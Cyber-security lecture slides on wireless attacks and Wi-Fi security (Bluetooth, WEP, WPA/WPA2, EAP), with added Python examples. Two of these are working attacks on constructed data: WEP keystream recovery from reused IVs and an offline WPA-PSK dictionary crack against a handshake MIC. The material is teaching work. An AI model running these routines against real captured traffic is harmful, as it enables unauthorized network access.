Week 09

The document discusses security vulnerabilities in wireless networks such as Bluetooth, Wi-Fi, and early wireless security protocols. It describes attacks like bluejacking, bluesnarfing against Bluetooth devices. For Wi-Fi networks, it outlines vulnerabilities in protocols like WEP encryption and open authentication. It also explains attacks like rogue access points, evil twins and war driving that target wireless networks.

Uploaded by Sibtain Tahir

Cyber Security

Week 09
Professor Tahir Sabtain Syed
Introduction
 Wireless data communications have
revolutionized computer networking
 Wireless data networks found virtually everywhere
 Wireless networks have been targets for
attackers
 Early wireless networking standards had
vulnerabilities
 Changes in wireless network security yielded security
comparable to wired networks

2
Wireless Attacks
 Bluetooth
 Wireless technology
 Uses short-range radio frequency transmissions
 Provides for rapid, ad-hoc device pairings
 Example: smartphone and Bluetooth headphones
 Personal Area Network (PAN) technology
 Two types of Bluetooth network topologies
 Piconet
 Scatternet

3
Wireless Attacks (cont’d.)
 Piconet
 Established when two Bluetooth devices connect to
each other
 One device (master) controls all wireless traffic
 Other devices (slaves, up to seven active at a time) take commands
 Active slaves can send transmissions
 Parked slaves are connected but not actively participating

4
Bluetooth piconet

5
Wireless Attacks (cont’d.)
 Scatternet
 Group of piconets with connections between
different piconets
 Bluejacking
 Attack that sends unsolicited messages to Bluetooth-
enabled devices
 Text messages, images, or sounds
 Considered more annoying than harmful
 No data is stolen; the target only needs to be discoverable
 http://www.youtube.com/watch?v=ajo0njlklYo

6
Figure Bluetooth scatternet

7
Wireless Attacks (cont’d.)
 Bluesnarfing
 Unauthorized access to wireless information through
a Bluetooth connection
 Often between cell phones and laptops
 Attacker copies e-mails, contacts, or other data by
connecting to the Bluetooth device without owner’s
knowledge
 http://www.youtube.com/watch?v=KfZ7Ek409LM
 http://www.youtube.com/watch?v=AwoEflxJPzE

8
Wireless LAN Attacks
 Institute of Electrical and Electronics Engineers
(IEEE)
 Most influential organization for computer networking
and wireless communications
 Traces its roots to 1884 (predecessor organization AIEE)
 Began developing network architecture standards in
the 1980s
 1997: release of IEEE 802.11
 Standard for wireless local area networks (WLANs)
 Higher speeds added in 1999: IEEE 802.11b (11 Mbps in the 2.4 GHz band)

9
Wireless LAN Attacks (cont’d.)
 IEEE 802.11a
 Specifies maximum rated speed of 54 Mbps using the
5 GHz spectrum (also ratified in 1999)
 IEEE 802.11g
 Preserves stable and widely accepted features of
802.11b (2.4 GHz band, backward compatible)
 Increases data transfer rates to 54 Mbps, similar to 802.11a

 IEEE 802.11n
 Ratified in 2009

10
Wireless LAN Attacks (cont’d.)
 Improvements in IEEE 802.11n
 Speed – up to 600 Mbps (four spatial streams, 40 MHz channels)
 Coverage area – double a, b, g
 Interference – can operate in either the 2.4 GHz or the 5 GHz band
 Security – high-throughput rates require WPA2 (AES-CCMP); WEP and TKIP are limited to legacy rates

 Wireless client network interface card adapter


 Performs same functions as wired adapter
 Antenna sends and receives signals

11
Wireless LAN Attacks (cont’d.)
 Access point (AP) major parts
 Antenna and radio transmitter/receiver send and
receive wireless signals
 Bridging software to interface wireless devices to
other devices
 Wired network interface allows it to connect by cable
to standard wired network
 AP functions
 Acts as “base station” for wireless network

12
Figure Access point

13
Wireless LAN Attacks (cont’d.)
 AP functions (cont’d.)
 Acts as a bridge between wireless and wired
networks
 Can connect to wired network by a cable
 Autonomous access points
 Separate from other network devices and access
points
 Have necessary “intelligence” for wireless
authentication, encryption, and management

14
Wireless LAN Attacks (cont’d.)
 Wireless broadband routers
 Single hardware device containing AP, firewall, router,
and DHCP server
 Wireless networks have been vulnerable targets
for attackers
 Not restricted to a cable
 Types of wireless LAN attacks
 Discovering the network
 Attacks through the RF spectrum
 Attacks involving access points

15
Wireless LAN Attacks (cont’d.)
 Discovering the network
 One of first steps in attack is to discover presence of
a network
 Beaconing
 AP sends signal at regular intervals to announce its
presence and provide connection information
 Wireless device scans for beacon frames
 http://www.youtube.com/watch?v=rGYy1F1fhjc

 War driving
 Process of passive discovery of wireless network
locations
16
Wireless LAN Attacks (cont’d.)
 War chalking
 Documenting and then advertising location of wireless
LANs for others to use
 Previously done by drawing on sidewalks or walls
around network area
 Today, locations are posted on Web sites

 http://www.youtube.com/watch?v=2rM-K6SQTiU

17
Table War chalking symbols

18
Wireless LAN Attacks (cont’d.)
 Attacks through the RF (Radio Frequency)
spectrum
 Wireless protocol analyzer
 Generating interference (jamming)

 Wireless protocol analyzer
 Wireless traffic captured to decode and analyze
packet contents
 Network interface card (NIC) adapter must be in
correct mode (monitor mode, so it passes up every frame it hears, not only frames addressed to it)
 Tools: Kismet, airmon-ng (part of the aircrack-ng suite), Wireshark

19
Wireless LAN Attacks (cont’d.)
 Attacks using access points
 Rogue access point – installed by an internal user without authorization
 Evil twin – installed by an attacker

 Rogue access point
 Unauthorized access point that allows attacker to bypass
network security configurations
 May be set up behind a firewall, opening the network to
attacks

20
Figure Rogue access point

21
Wireless LAN Attacks (cont’d.)

 Evil twin
 AP set up by an attacker
 Attempts to mimic an authorized AP
 Attackers capture transmissions from users to evil twin
AP

22
Vulnerabilities of IEEE 802.11 Security
 Original IEEE 802.11 committee recognized
wireless transmissions could be vulnerable
 Implemented several wireless security protections in
the standard
 Left others to WLAN vendor’s discretion
 Protections were vulnerable and led to multiple
attacks

23
MAC Address Filtering
 Method of controlling WLAN access
 Limit a device’s access to AP
 Media Access Control (MAC) address filtering
 Used by nearly all wireless AP vendors
 Permits or blocks device based on MAC address

 Vulnerabilities of MAC address filtering
 Addresses are carried in the 802.11 frame header in cleartext, even on an encrypted network
 Attacker can see address of approved device and
substitute it on his own device
 Managing large number of addresses is challenging

24
Figure MAC address filtering

25
SSID Broadcast
 Each device must be authenticated prior to
connecting to the WLAN
 Open system authentication
 Device discovers wireless network and sends an
authentication request, then an association request frame, to the AP
 Association request frame carries the Service Set Identifier (SSID)
 User-supplied network name
 Can be any string of up to 32 bytes
 AP compares SSID with actual SSID of network
 If the two match, wireless device is accepted; no secret is ever proven

26
Figure: Open system authentication

27
SSID Broadcast (cont’d.)
 Open system authentication is weak
 Based only on match of SSIDs
 Attacker can wait for the SSID to be broadcast by the
AP
 Users can configure APs to prevent beacon
frame from including the SSID
 Provides only a weak degree of security
 SSID is still sent in cleartext in other frames (probe requests, probe responses, association requests)
 Older versions of Windows XP have an added
vulnerability if this approach is used: the client keeps probing for the hidden SSID wherever it goes, revealing it
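The fields the last few slides rely on (cleartext addresses, beacon frames, the SSID element, the privacy capability bit) can be decoded directly. The following is an added example, not code from the original slides: it builds a few constructed management frames, parses them, treats an empty or all-NUL SSID element as a hidden network, and flags a beacon that advertises a known SSID from an unlisted BSSID, which is the evil twin case from the earlier slide. The MAC addresses, the SSID "CorpNet" and the authorized list are made up for the example.

```python
import struct

# IEEE 802.11 management frame subtypes (frame type 0)
SUBTYPE_PROBE_RESP = 5
SUBTYPE_BEACON = 8
CAP_PRIVACY = 0x0010        # capability bit: encryption (WEP/WPA) required
IE_SSID = 0                 # information element tag for the SSID
IE_SUPPORTED_RATES = 1

# Constructed sample values (not real devices)
CORP_BSSID = bytes.fromhex("001122334455")
ROGUE_BSSID = bytes.fromhex("66778899aabb")
AUTHORIZED = {"CorpNet": {"00:11:22:33:44:55"}}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype: int, bssid: bytes, ssid: bytes, privacy: bool) -> bytes:
    """Build a minimal beacon / probe response: 24-byte header, fixed fields, two IEs."""
    frame_control = subtype << 4               # version 0, type 0 (management), subtype
    header = struct.pack("<HH6s6s6sH", frame_control, 0,
                         b"\xff" * 6,          # addr1: destination (broadcast)
                         bssid,                # addr2: source (the AP)
                         bssid,                # addr3: BSSID
                         0)                    # sequence control
    capability = CAP_PRIVACY if privacy else 0
    body = struct.pack("<QHH", 0, 100, capability)   # timestamp, beacon interval, capability
    body += bytes([IE_SSID, len(ssid)]) + ssid
    body += bytes([IE_SUPPORTED_RATES, 4, 0x82, 0x84, 0x8B, 0x96])  # 1, 2, 5.5, 11 Mbps
    return header + body


def parse_mgmt_frame(frame: bytes) -> dict:
    """Decode the fields an attacker (or a wireless IDS) reads from a beacon / probe response."""
    (frame_control,) = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (frame_control >> 2) & 0x3, (frame_control >> 4) & 0xF
    if ftype != 0:
        raise ValueError("not a management frame")
    src, bssid = frame[10:16], frame[16:22]   # addresses are never encrypted in 802.11
    body = frame[24:]
    _timestamp, _interval, capability = struct.unpack_from("<QHH", body, 0)
    ies, off = {}, 12
    while off + 2 <= len(body):               # walk the tag/length/value elements
        tag, length = body[off], body[off + 1]
        value = body[off + 2:off + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        ies[tag] = value
        off += 2 + length
    raw_ssid = ies.get(IE_SSID, b"")
    # "Hidden" SSID: zero-length element, or (some vendors) a run of NUL bytes
    hidden = len(raw_ssid) == 0 or raw_ssid.strip(b"\x00") == b""
    return {
        "subtype": subtype,
        "src": mac_str(src),
        "bssid": mac_str(bssid),
        "ssid": None if hidden else raw_ssid.decode("utf-8", "replace"),
        "hidden": hidden,
        "privacy": bool(capability & CAP_PRIVACY),
    }


def find_evil_twins(frames, authorized=AUTHORIZED) -> list:
    """Flag frames advertising a known SSID from a BSSID that is not on the authorized list."""
    findings = []
    for frame in frames:
        info = parse_mgmt_frame(frame)
        if info["ssid"] in authorized and info["bssid"] not in authorized[info["ssid"]]:
            findings.append((info["ssid"], info["bssid"]))
    return findings


def sample_capture() -> list:
    """Constructed capture: hidden beacon, probe response that leaks the name, evil twin."""
    return [
        build_mgmt_frame(SUBTYPE_BEACON, CORP_BSSID, b"", True),
        build_mgmt_frame(SUBTYPE_PROBE_RESP, CORP_BSSID, b"CorpNet", True),
        build_mgmt_frame(SUBTYPE_BEACON, ROGUE_BSSID, b"CorpNet", False),
    ]


if __name__ == "__main__":
    for f in sample_capture():
        print(parse_mgmt_frame(f))
    print("evil twins:", find_evil_twins(sample_capture()))
```

The second frame is the point of the hidden-SSID slide: the AP stops naming itself in beacons, but the name still travels in cleartext in the probe response to any client that asks. The third frame shows why SSID alone is no identity: the evil twin advertises the same name, open, from its own BSSID, and only a list of authorized BSSIDs lets you tell them apart.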

28
Wired Equivalent Privacy (WEP)
 IEEE 802.11 security protocol
 Encrypts plaintext into ciphertext
 Secret key is shared between wireless client
device and AP
 Key used to encrypt and decrypt packets
 WEP vulnerabilities
 WEP key is only 64 bits (40-bit secret key) or 128 bits (104-bit secret key)
 Initialization vector (IV) is 24 of those bits and is sent in cleartext with every packet
 Short length makes it easier to break

29
Wired Equivalent Privacy (cont’d.)
 WEP vulnerabilities (cont’d.)
 Violates cardinal rule of cryptography: avoid a
detectable pattern (never reuse a keystream)
 Attackers can see duplication when IVs start
repeating; with only 2^24 values, repeats are inevitable on a busy network
 Keystream attack (or IV attack)
 Attacker identifies two packets encrypted under the same IV
 XOR of the two ciphertexts equals XOR of the two plaintexts, so any known plaintext reveals the other
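The keystream attack in concrete form. This is an added example, not code from the slides: a toy WEP encryptor (RC4 keyed with IV || secret, ICV omitted), a scan of a constructed capture for reused IVs, and the XOR recovery of a packet whose keystream partner is known. The key, IVs and packet contents are made up; the LLC/SNAP header prefix is the kind of predictable plaintext real attacks lean on.

```python
def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream (key scheduling + output generation), the cipher WEP uses."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: cleartext 24-bit IV, then plaintext XOR RC4(IV || secret key).
    The CRC-32 ICV that WEP appends is left out; it is encrypted the same way."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    keystream = rc4(iv + secret_key, len(plaintext))
    return iv + xor(plaintext, keystream)


def find_iv_reuse(packets) -> dict:
    """Group captured frame bodies by IV; every IV seen more than once shares one keystream."""
    by_iv = {}
    for pkt in packets:
        by_iv.setdefault(pkt[:3], []).append(pkt[3:])
    return {iv: bodies for iv, bodies in by_iv.items() if len(bodies) > 1}


def recover_with_known_plaintext(ct_known: bytes, pt_known: bytes, ct_target: bytes) -> bytes:
    """c1 = p1 ^ ks and c2 = p2 ^ ks, so c1 ^ c2 = p1 ^ p2; knowing p1 yields p2 (up to len(p1))."""
    keystream = xor(ct_known, pt_known)
    return xor(ct_target, keystream)


# Constructed sample capture (not real traffic)
WEP_KEY = bytes.fromhex("0102030405")                 # 40-bit secret ("64-bit WEP")
LLC_SNAP_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"     # predictable header at the start of IP frames
P_KNOWN = LLC_SNAP_IP + b"A" * 24                     # packet whose content the attacker knows
P_TARGET = LLC_SNAP_IP + b"pw=hunter2"                # packet the attacker wants to read
REUSED_IV = b"\x00\x00\x01"


def sample_capture() -> list:
    return [
        wep_encrypt(WEP_KEY, b"\x00\x00\x02", b"\xaa" * 16),
        wep_encrypt(WEP_KEY, b"\x00\x00\x03", b"\xbb" * 16),
        wep_encrypt(WEP_KEY, REUSED_IV, P_KNOWN),
        wep_encrypt(WEP_KEY, REUSED_IV, P_TARGET),      # same IV, so same keystream
    ]


def attack() -> bytes:
    """Find a reused IV in the capture and decrypt the second packet without the key."""
    reused = find_iv_reuse(sample_capture())
    ct_known, ct_target = reused[REUSED_IV]
    return recover_with_known_plaintext(ct_known, P_KNOWN, ct_target)


if __name__ == "__main__":
    print(attack())
```

Nothing here touches the secret key: the recovered keystream is only as long as the known plaintext, but the LLC/SNAP and IP headers that begin every data frame already give an attacker a dozen bytes for free. With random IVs a repeat is expected after roughly five thousand packets (birthday bound on 2^24), and many early cards simply counted IVs up from zero at power-on, which made the collisions far more frequent than that.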

30
Figure : XOR operations

31
Figure 8-11 Capturing packets
© Cengage Learning 2012

32
Wireless Security Solutions
 Unified approach to WLAN security was needed
 IEEE and Wi-Fi Alliance began developing security
solutions
 Resulting standards used today
 IEEE 802.11i
 WPA and WPA2

33
Wi-Fi Protected Access (WPA)
 Introduced in 2003 by the Wi-Fi Alliance
 A subset of IEEE 802.11i
 Design goal: protect present and future wireless
devices
 Temporal Key Integrity Protocol (TKIP)
Encryption
 Used in WPA
 Uses longer 128 bit key than WEP
 Mixed with the sender's MAC address and a packet sequence counter into a fresh RC4 key for each packet (still RC4 underneath, so it runs on WEP-era hardware)

34
Wi-Fi Protected Access (cont’d.)
 Preshared Key (PSK) Authentication
 After AP configured, client device must have same
key value entered
 Key is shared prior to communication taking place
 Uses a passphrase to generate encryption key
 Must be entered on each AP and wireless device in advance
 Not used for encryption
 Serves as starting point for mathematically generating the
encryption keys

35
Wi-Fi Protected Access (cont’d.)
 Vulnerabilities in WPA
 Key management
 Key sharing is done manually without security protection
 Keys must be changed on a regular basis
 Key must be disclosed to guest users
 Passphrases
 PSK passphrases of fewer than 20 characters subject to
cracking
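The two slides above say the passphrase is only a starting point and that short passphrases are crackable; the following added example (not code from the original slides) shows both: the passphrase is stretched into the PSK with PBKDF2 (salted with the SSID), the PSK is expanded into the pairwise keys that the 4-way handshake actually uses, and an offline dictionary attack checks candidates against the MIC of a captured handshake message. The SSID, MAC addresses, nonces, the EAPOL stand-in bytes and the wordlist are all constructed; the only external value is the IEEE 802.11i test vector for "password"/"IEEE" used to check the derivation.

```python
import hashlib
import hmac


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PSK (used directly as the PMK) =
    PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The passphrase itself never encrypts traffic; only keys derived from it do."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i) blocks."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the 4-way handshake inputs (CCMP: 48 bytes = KCK|KEK|TK)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 EAPOL-Key MIC: HMAC-SHA1 over the frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake (no real devices): everything a passive listener would see
SSID = "CorpNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for EAPOL-Key message 2 with its MIC field zeroed (fields abbreviated)
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + SNONCE + b"\x00" * 16


def compute_mic(passphrase: str) -> bytes:
    """MIC the client would place in message 2 if the network used this passphrase."""
    ptk = derive_ptk(derive_psk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2)        # first 16 bytes of the PTK are the KCK


def crack(captured_mic: bytes, wordlist):
    """Offline dictionary attack: needs only the broadcast SSID and one captured handshake.
    Each guess costs 4096 HMAC-SHA1 rounds, which slows but does not stop a short-passphrase search."""
    for candidate in wordlist:
        if compute_mic(candidate) == captured_mic:
            return candidate
    return None


if __name__ == "__main__":
    target = compute_mic("hunter2")                # what the sniffer captured
    print(crack(target, ["password", "letmein", "hunter2", "correct horse battery staple"]))
```

Two practical consequences follow from the code. The salt is the SSID, so a default or common network name lets an attacker precompute PSKs for a whole wordlist once and reuse them against every network with that name; and because the check needs nothing from the AP after the capture, changing the key only helps if every captured handshake predates the change.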

36
Wi-Fi Protected Access 2 (WPA2)
• Second generation of WPA known as WPA2
 Introduced in 2004
 Based on final IEEE 802.11i standard
 Uses Advanced Encryption Standard (AES)
 Supports both PSK and IEEE 802.1X authentication
 AES-CCMP Encryption
 Encryption protocol standard for WPA2
 CCM = AES in counter (CTR) mode, which provides data privacy, combined with CBC-MAC
 CBC-MAC component of CCMP provides data integrity
and authentication

37
Wi-Fi Protected Access 2 (cont’d.)
 AES encryption and decryption
 Should be performed in hardware because of its
computationally intensive nature
 IEEE 802.1x authentication
 Originally developed for wired networks
 Provides greater degree of security by implementing
port security
 Blocks all traffic on a port-by-port basis until client is
authenticated

38
Wi-Fi Protected Access 2 (cont’d.)
 Extensible Authentication Protocol (EAP)
 Framework for transporting authentication protocols
 Defines message format
 Uses four types of packets
 Request
 Response
 Success
 Failure
 Lightweight EAP (LEAP)
 Proprietary method developed by Cisco Systems; now deprecated because its MS-CHAP-style challenge/response is subject to offline dictionary attacks
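The EAP message format and the four packet codes on the slide, as an added example that is not code from the original slides: a builder and a strict parser for EAP packets (RFC 3748), the 802.1X EAPOL wrapper that carries them across the port, and the identifier check an authenticator applies before accepting a Response. The identity "alice" and the exchange are constructed.

```python
import struct

# EAP codes (RFC 3748); Success and Failure carry no Type field
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_CODE_NAMES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPE_IDENTITY = 1
EAPOL_VERSION, EAPOL_TYPE_EAP_PACKET = 1, 0   # 802.1X EAPOL header values


def build_eap(code: int, identifier: int, eap_type=None, data: bytes = b"") -> bytes:
    """EAP packet: Code(1) | Identifier(1) | Length(2, whole packet) | [Type(1) | Type-Data]."""
    if code in (EAP_SUCCESS, EAP_FAILURE):
        body = b""
    elif eap_type is None:
        raise ValueError("Request/Response must carry a Type")
    else:
        body = bytes([eap_type]) + data
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap(pkt: bytes) -> dict:
    """Decode an EAP packet, rejecting malformed code/length/type combinations."""
    if len(pkt) < 4:
        raise ValueError("short EAP header")
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if code not in EAP_CODE_NAMES:
        raise ValueError(f"unknown EAP code {code}")
    if length < 4 or length > len(pkt):
        raise ValueError("EAP Length field exceeds received bytes")
    body = pkt[4:length]                      # bytes beyond Length are padding, ignored
    result = {"code": EAP_CODE_NAMES[code], "id": identifier}
    if code in (EAP_SUCCESS, EAP_FAILURE):
        return result
    if not body:
        raise ValueError("Request/Response without Type")
    result.update(type=body[0], data=body[1:])
    return result


def eapol_wrap(eap_pkt: bytes) -> bytes:
    """802.1X EAPOL frame: Version(1) | Type(1)=EAP-Packet | Length(2) | EAP packet."""
    return struct.pack("!BBH", EAPOL_VERSION, EAPOL_TYPE_EAP_PACKET, len(eap_pkt)) + eap_pkt


def response_matches(request: bytes, response: bytes) -> bool:
    """A supplicant reply must be a Response echoing the outstanding Request's Identifier."""
    req, resp = parse_eap(request), parse_eap(response)
    return req["code"] == "Request" and resp["code"] == "Response" and req["id"] == resp["id"]


def identity_exchange(identity: bytes) -> list:
    """Constructed start of an 802.1X exchange: the four packet kinds on the slide, EAPOL-wrapped."""
    req = build_eap(EAP_REQUEST, 1, EAP_TYPE_IDENTITY)
    resp = build_eap(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, identity)
    success = build_eap(EAP_SUCCESS, 2)
    failure = build_eap(EAP_FAILURE, 2)
    return [eapol_wrap(p) for p in (req, resp, success, failure)]


if __name__ == "__main__":
    for frame in identity_exchange(b"alice"):
        print(frame.hex(), parse_eap(frame[4:]))
```

The Length check matters more than it looks: an authenticator that trusts the Length field over the number of bytes actually received reads past the buffer, and a Response whose Identifier does not match the outstanding Request must be discarded rather than matched to whatever method is waiting. The Identity itself travels in cleartext on the port, which is why EAP methods that tunnel the real credentials (PEAP, EAP-TTLS) took over from LEAP.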

39
